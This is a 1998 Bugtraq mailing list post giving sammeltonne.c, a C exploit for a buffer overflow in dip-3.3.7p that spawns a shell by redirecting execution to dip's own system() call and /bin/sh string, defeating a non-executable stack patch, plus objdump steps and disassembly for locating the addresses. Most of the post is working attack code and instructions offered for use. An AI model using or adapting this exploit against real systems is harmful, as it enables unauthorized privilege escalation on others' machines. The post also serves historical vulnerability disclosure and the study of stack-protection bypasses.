Bugtraq mailing list archives

dip-3.3.7p exploit (stackpatch_

From: tstroege () CIP INFORMATIK UNI-ERLANGEN DE (Thomas Troeger)
Date: Fri, 26 Jun 1998 17:46:53 +0200


Hi,

While playing around with dip-3.3.7p I realized that the method I used in my
previous posting won't do. So I had a look at the source and developed a new
program. Here it goes:

------------------- sammeltonne.c -------------------
/*
 * Programm to get a shell from dip-3.3.7p on a system with
 * Solar Designer's stackpatch installed.
 * by tstroege () cip informatik uni-erlangen de
 *
 * Of course this is just for educational purposes too :)
 */

#define SOMETEXT 0x0804cee5
/* address of text system call */

#define CMDSTR 0x08054f0e
/* address where command string should be */

#define DIP "/usr/sbin/dip"
/* path of dip */

int main(int argc, char *argv[]) {
  char mem[256], *ptr;
  char *name[]={ DIP, "-k", "-l", mem, (char *)0 };
  int i, code[]={ SOMETEXT, CMDSTR, 0 };
  int off=117;

  if (argc > 1) off=atoi(argv[1]);

  for (ptr=mem, i=0; i < 256; i++) *ptr++='a';
  ptr=mem+off;
  strcpy(ptr, (char *)&(code[0]));
  mem[255]=0;
  execve(name[0], name, 0);
  return 0;
}
-----------------------------------------------

SOMETEXT:
  address in text segment where system is called.

CMDSTR:
  address in text segment where a suitable command string is stored
  (dip is nice enough to have a /bin/sh string in its code).

The both addresses will be different on your system, so here is a way to
find them out:

...
objdump --disassemble-all /usr/sbin/dip
...

Now search for the following pattern:

   ...
   0804ced4 pushl  %ebx
   0804ced5 pushl  $0x8054848
   0804ceda pushl  $0x6
   0804cedc call   08049678
   0804cee1 addl   $0xc,%esp
   0804cee4 pushl  %ebx
-->0804cee5 call   080493c8        SOMETEXT
   0804ceea addl   $0x4,%esp
   0804ceed testl  %eax,%eax
   0804ceef jne    0804cf9e
   0804cef5 pushl  %esi
   0804cef6 movl   0x8(%ebp),%eax
   0804cef9 movl   0x660(%eax),%eax
   0804ceff pushl  %eax
   ...
   0804eefd leal   0xfffffc00(%ebp),%eax
   0804ef03 pushl  %eax
   0804ef04 pushl  $0x8054f08
   0804ef09 pushl  $0x8054f0b
   0804ef0e pushl  $0x8054f0e<--   CMDSTR
   0804ef13 call   08049368
   0804ef18 pushl  $0x7f
   0804ef1a call   08049768
   0804ef1f nop
   ...

tst.

Current thread:

Bug is sudo?, (continued)
- - - Bug is sudo? Rhodie (Jun 25)
    - Re: Bug is sudo? Warner Losh (Jun 26)
    - Re: Bug is sudo? Todd C. Miller (Jun 27)
    - Re: security hole in mailx Alvaro Martinez Echevarria (Jun 25)
    - Re: security hole in mailx Ben Collins (Jun 25)
    - Re: security hole in mailx Theo de Raadt (Jun 25)
    - guestbook script is still vulnerable under apache Stunt Pope (Jun 25)
    - Re: guestbook script is still vulnerable under apache Theo Van Dinter (Jun 25)
    - Re: guestbook script is still vulnerable under apache Andru Luvisi (Jun 25)
    - Re: guestbook script is still vulnerable under apache Lincoln Stein (Jun 26)
    - dip-3.3.7p exploit (stackpatch_ Thomas Troeger (Jun 26)
    - And another qpopper overflow (does this make 3?) Aaron D. Gifford (Jun 28)
    - Re: dip-3.3.7p exploit (stackpatch_ M.C.Mar (Jun 28)
    - WIPO Bill Aleph One (Jun 25)
    - Re: guestbook script is still vulnerable under apache Dean Gaudet (Jun 25)
    - Re: guestbook script is still vulnerable under apache Lars Eilebrecht (Jun 25)
    - Re: guestbook script is still vulnerable under apache Andrew Clegg (Jun 26)
    - Re: security hole in mailx Seth McGann (Jun 25)